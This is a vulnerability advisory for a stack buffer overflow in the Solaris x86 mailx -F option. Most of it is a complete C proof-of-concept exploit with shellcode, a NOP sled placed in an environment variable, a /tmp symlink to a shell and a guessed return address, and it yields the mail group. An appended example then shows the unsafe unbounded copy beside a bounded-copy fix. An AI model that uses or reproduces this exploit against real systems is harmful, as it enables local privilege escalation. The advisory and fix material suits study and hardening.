source: http://www.securityfocus.com/bid/2610/info
Solaris is the variant of the UNIX Operating System distributed by Sun Microsystems. Solaris is designed as a scalable operating system for the Intel x86 and Sun Sparc platforms, and operates on machines varying from desktop to enterprise server.
A problem with the handling of a long string of characters passed to the -F option of mailx makes it possible for a local user to gain elevated privileges. Because the -F option does not adequately bound its input, an argument of 1150 characters overflows a stack buffer and overwrites variables on the stack, including the saved return address.
This problem makes it possible for a local user to gain elevated privileges, attaining an effective GID of mail.
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
/usr/bin/mailx overflow proof of concept.
Pablo Sor, Buenos Aires, Argentina 04/2001
[email protected], [email protected]
works against x86 solaris 8
default offset should work.
usage:
bash$ id
uid=100(laika) gid=1(other)
bash$ ./mailx-exp
Subject: tomy
.
EOT
[wait...]
$ id
uid=100(laika) gid=1(other) egid=6(mail)
*/
/* Returns the current stack pointer (32-bit x86: result left in %eax). */
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
/* Shellcode; the trailing bytes spell "/tmp/xx", the symlink created below. */
char shell[]=
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
"\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";
unsigned long magic = get_esp() + 2075; /* default offset */
unsigned char buf[1150];
char *envi;
/* Environment variable SOR= holding a NOP sled followed by the shellcode. */
envi = (char *)malloc(300*sizeof(char));
memset(envi,0x90,300);
memcpy(envi+280-strlen(shell),shell,strlen(shell));
memcpy(envi,"SOR=",4);
envi[299]=0;
putenv(envi);
symlink("/bin/ksh","/tmp/xx");
/* 1150-byte -F argument: filler with the guessed address at offset 1116. */
memset(buf,0x41,1150);
memcpy(buf+1116,&magic,4);
buf[1149]=0;
execl("/usr/bin/mailx","mailx","-F",buf,NULL);
return 0;
}
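The defect the advisory describes is an unbounded copy of the -F argument into a fixed-size stack buffer. The following added example (not mailx's own code, whose source and real buffer size are not on this page; FOLDER_BUF is a hypothetical stand-in) shows the unsafe pattern next to a bounded copy that rejects an over-long argument instead of overrunning the stack:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical buffer size standing in for the one in mailx; the page only
 * states that a 1150-character -F argument overruns it. */
#define FOLDER_BUF 1024

/* Unsafe pattern: no length check, so an argument of FOLDER_BUF bytes or
 * more writes past the end of dst and clobbers what follows on the stack. */
void set_folder_unsafe(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened pattern: refuse the argument when it does not fit, copy only
 * what was measured, and keep the terminator. Returns 0 on success, -1
 * when the argument is too long for the buffer. */
int set_folder_safe(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Builds a constructed -F argument of `len` repeated 'A' bytes and returns
 * 1 if the hardened copy accepts it, 0 if it is rejected, -1 on bad len. */
int folder_arg_accepted(size_t len)
{
    char arg[2048];
    char folder[FOLDER_BUF];
    if (len >= sizeof(arg))
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return set_folder_safe(folder, sizeof(folder), arg) == 0;
}

int main(void)
{
    printf("1150-char -F argument accepted: %d\n", folder_arg_accepted(1150));
    printf("64-char -F argument accepted: %d\n", folder_arg_accepted(64));
    return 0;
}
```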